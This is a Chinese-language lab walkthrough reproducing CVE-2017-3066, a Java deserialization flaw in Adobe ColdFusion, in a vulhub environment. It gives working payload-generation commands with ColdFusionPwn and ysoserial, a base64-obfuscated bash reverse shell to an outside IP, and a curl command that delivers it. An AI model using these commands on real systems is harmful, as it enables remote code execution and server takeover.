漏洞详情
Adobe ColdFusion
是美国Adobe
公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)
是针对Web应用的一种程序设计语言。
Adobe ColdFusion
中存在java
反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion (2016 release) Update 3
及之前的版本,ColdFusion 11 Update 11
及之前的版本,oldFusion 10 Update 22
及之前的版本。
漏洞环境
使用vulhub
启动漏洞环境
1 | cd /root/vulhub/coldfusion/CVE-2017-3066/ |
等待数分钟时间,环境启动成功,访问http://your-ip:8500/CFIDE/administrator/index.cfm
,输入密码vulhub
,即可成功安装Adobe ColdFusion
安装成功后页面如下:
漏洞复现
使用ColdFusionPwn工具来生成POC:
同时获取最新版的ysoserial。放在同一目录下
生成POC(执行命令touch /tmp/success
):
1 | java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser |
POC生成于poc.ser
文件中,将POC作为数据包body发送给http://your-ip:8500/flex2gateway/amf
,Content-Type
为application/x-amf
:
1 | POST /flex2gateway/amf HTTP/1.1 |
进入容器中,发现/tmp/success
已成功创建:
接下来试一下反弹shell
(生成一个反弹shell的poc):
1 | java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDEuNjIuMjAvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}' shell.ser |
使用curl
命令提交poc:
1 | curl http://47.101.62.20:8500/flex2gateway/amf --data-binary @shell.ser |
成功反弹shell: